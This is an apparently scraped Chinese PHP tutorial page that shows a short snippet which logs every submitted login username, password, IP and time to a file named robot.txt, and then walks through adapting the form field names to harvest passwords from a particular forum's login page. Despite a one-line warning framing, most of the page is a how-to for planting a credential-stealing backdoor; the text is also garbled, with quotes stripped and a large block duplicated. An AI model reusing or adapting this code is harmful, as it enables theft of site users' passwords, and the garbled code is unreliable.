php截取后臺登陸密碼的代碼
更新時間:2012年05月05日 01:24:13 作者:
php截取后臺登陸密碼的代碼,很多時候黑客留了這樣的代碼,大家一定要注意下
if($_POST[loginsubmit]!=){ //判斷是否點了登陸按鈕
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫入一個文件
下面簡單分析一下,以華夏的登陸頁面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過來.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號。。。。。。
<TR>
<TD height=40>賬號(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫入一個文件
下面簡單分析一下,以華夏的登陸頁面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過來.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號。。。。。。
<TR>
<TD height=40>賬號(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
您可能感興趣的文章:
相關(guān)文章
PHP Socket網(wǎng)絡(luò)操作類定義與用法示例
這篇文章主要介紹了PHP Socket網(wǎng)絡(luò)操作類定義與用法,結(jié)合實例形式分析了php socket網(wǎng)絡(luò)操作類的定義及結(jié)合ajax發(fā)送查詢請求等相關(guān)使用技巧,需要的朋友可以參考下2017-08-08PHP MVC模式在網(wǎng)站架構(gòu)中的實現(xiàn)分析
MVC模式在網(wǎng)站架構(gòu)中十分常見。它允許我們建立一個三層結(jié)構(gòu)的應(yīng)用程式,從代碼中分離出有用的層,幫助設(shè)計師和開發(fā)者協(xié)同工作以及提高我們維護(hù)和擴(kuò)展既有程式的能力。2010-03-03